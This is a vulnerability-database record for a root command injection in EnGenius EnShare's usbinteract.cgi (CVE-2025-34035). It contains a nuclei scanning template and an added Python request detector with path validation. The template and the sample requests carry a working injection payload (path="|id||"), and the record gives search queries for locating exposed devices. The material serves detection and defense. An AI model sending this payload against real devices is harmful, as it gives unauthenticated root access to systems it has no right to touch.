EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 Root Remote Code Execution

Reported by ProjectDiscovery on 03 Jul 2026 13:39:16. Type: nuclei. Source: github.com.

EnShare Cloud Service 1.4.11 injection in usbinteract.cgi yields unauthenticated remote root exec

Related records (reporter, title, published):

Circl: CVE-2025-34035 (24 Jun 2025 01:35)
CNNVD: EnGenius EnShare Cloud Service operating system command injection vulnerability (24 Jun 2025 00:00)
CVE: CVE-2025-34035 (24 Jun 2025 01:00)
Cvelist: CVE-2025-34035 EnGenius EnShare IoT Gigabit Cloud Service Command Injection (24 Jun 2025 01:00)
EUVD: EUVD-2025-18966 (24 Jun 2025 01:00)
NVD: CVE-2025-34035 (24 Jun 2025 01:15)
OSV: CVE-2025-34035 (24 Jun 2025 01:15)
Positive Technologies: PT-2025-26662 (24 Jun 2025 00:00)
RedhatCVE: CVE-2025-34035 (26 Jun 2025 03:12)
VulnCheck KEV: VulnCheck KEV: CVE-2025-34035 (23 Jun 2025 00:00)

Nuclei template:

id: CVE-2025-34035

info:
  name: EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 Root Remote Code Execution
  author: intelligent-ears
  severity: critical
  description: |
    An OS command injection vulnerability exists in EnGenius EnShare Cloud Service version 1.4.11 and earlier. The usbinteract.cgi script fails to properly sanitize user input passed to the path parameter, allowing unauthenticated remote attackers to inject arbitrary shell commands. The injected commands are executed with root privileges, leading to full system compromise.
  impact: |
    Unauthenticated attackers can inject and execute arbitrary shell commands with root privileges through the path parameter in usbinteract.cgi, achieving complete system compromise.
  remediation: |
    Upgrade EnGenius EnShare Cloud Service to version 1.4.12 or later that properly sanitizes user input in CGI scripts.
  reference:
    - https://cxsecurity.com/issue/WLB-2017060050
    - https://www.exploit-db.com/exploits/42114
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5413.php
    - https://nvd.nist.gov/vuln/detail/CVE-2025-34035
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
    cvss-score: 10.0
    cve-id: CVE-2025-34035
    epss-score: 0.12334
    epss-percentile: 0.95702
    cwe-id: CWE-78
  metadata:
    verified: true
    shodan-query: html:"/web/cgi-bin/usbinfo.cgi"
    fofa-query: body="/web/cgi-bin/usbinfo.cgi"
    max-request: 1
  tags: cve,cve2025,engenius,enshare,rce,vkev,vuln

http:
  - raw:
      - |
        POST {{path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=7&path="|id||"

    payloads:
      path:
        - "/web/cgi-bin/usbinteract.cgi"
        - "/cgi-bin/usbinteract.cgi"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - "regex('uid=([0-9(a-z_)]+) gid=([0-9(a-z_)]+)', body)"
          - 'contains(body, "Content-type: text/html")'
          - "status_code == 200"
        condition: and
# digest: 4b0a00483046022100f5a68d0c84dc0a23f689f9b7c1239c205ec4b3bcd0123b84d5d15e587a4a723d022100ba69be855348f945059487beb56ef1626bb7ea5b2473a59501a9ce833800e44d:922c64590222798bb761d5b6d8e72950
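Defender-side counterpart to the template above. The code below is an added example, not part of the nuclei template, of ProjectDiscovery's project or of EnShare: it inspects raw HTTP requests (as a reverse proxy or IDS would see them) for POSTs to usbinteract.cgi whose path form field carries shell metacharacters, which is exactly the shape of the template's own request, and it shows the allowlist validation the vulnerable script lacks, in the spirit of the remediation note. The sample requests, the rule name, the X-Forwarded-For source attribution and the allowlisted character set are constructed assumptions; the query-string check goes slightly beyond the template, which only sends the parameter in a POST body.

```python
"""Detection and input validation for the usbinteract.cgi path parameter.

Added example for CVE-2025-34035; not code from the nuclei template or from
EnShare. Sample requests and field names below are constructed.
"""
import re
from urllib.parse import parse_qs

# Shell metacharacters that never belong in a filesystem path handed to a
# CGI script (the CWE-78 injection vectors a detection should key on).
SHELL_META = re.compile(r'[|;&`$<>\n\r]')

# Allowlist for a legitimate USB-share path (assumption: alphanumerics,
# dot, underscore, dash and slash only, no parent-directory traversal).
SAFE_PATH = re.compile(r'^/[A-Za-z0-9_./-]*$')

TARGET_CGI = re.compile(r'/usbinteract\.cgi$')

# Constructed sample requests: one carrying the template's payload shape,
# one benign.
MALICIOUS_REQUEST = (
    "POST /web/cgi-bin/usbinteract.cgi HTTP/1.1\r\n"
    "Host: 192.0.2.10\r\n"
    "X-Forwarded-For: 198.51.100.7\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    'action=7&path="|id||"'
)
BENIGN_REQUEST = (
    "POST /web/cgi-bin/usbinteract.cgi HTTP/1.1\r\n"
    "Host: 192.0.2.10\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "action=7&path=/usb1/photos"
)


def parse_raw_request(raw):
    """Split a raw HTTP/1.x request into (method, target, headers, body)."""
    head, _, body = raw.replace('\r\n', '\n').partition('\n\n')
    lines = head.split('\n')
    method, target, _version = lines[0].split(' ', 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(':')
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def is_safe_usb_path(value):
    """Server-side validation the vulnerable script lacks: accept only
    allowlisted characters and reject parent-directory traversal."""
    return bool(SAFE_PATH.match(value)) and '..' not in value


def inspect_request(raw):
    """Return a finding dict when a POST to usbinteract.cgi carries shell
    metacharacters in its 'path' parameter (body or query), else None."""
    method, target, headers, body = parse_raw_request(raw)
    path_only, _, query = target.partition('?')
    if method != 'POST' or not TARGET_CGI.search(path_only):
        return None
    # parse_qs percent-decodes, so encoded metacharacters are caught too.
    values = parse_qs(query, keep_blank_values=True).get('path', [])
    values += parse_qs(body, keep_blank_values=True).get('path', [])
    for value in values:
        if SHELL_META.search(value):
            return {
                'rule': 'enshare-usbinteract-cmdi',  # constructed rule name
                'target': path_only,
                'path_param': value,
                'source': headers.get('x-forwarded-for', 'unknown'),
            }
    return None


def scan_requests(raws):
    """Run inspect_request over a batch and keep only the findings."""
    return [f for f in (inspect_request(r) for r in raws) if f is not None]


if __name__ == '__main__':
    for finding in scan_requests([MALICIOUS_REQUEST, BENIGN_REQUEST]):
        print(finding)
    print('benign path accepted:', is_safe_usb_path('/usb1/photos'))
    print('payload accepted:', is_safe_usb_path('"|id||"'))
```

The detection keys on metacharacters rather than on the literal `id` string, so it also covers variants of the same injection; the validator is the fix side, and a script that applied it before building a shell command would reject the template's request outright.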


Scores (current as of 04 Feb 2026 07:00): Vulners AI Score 6.1 (medium risk); CVSS 3.1: 9.8; CVSS 4.0: 10.0; EPSS: 0.12334.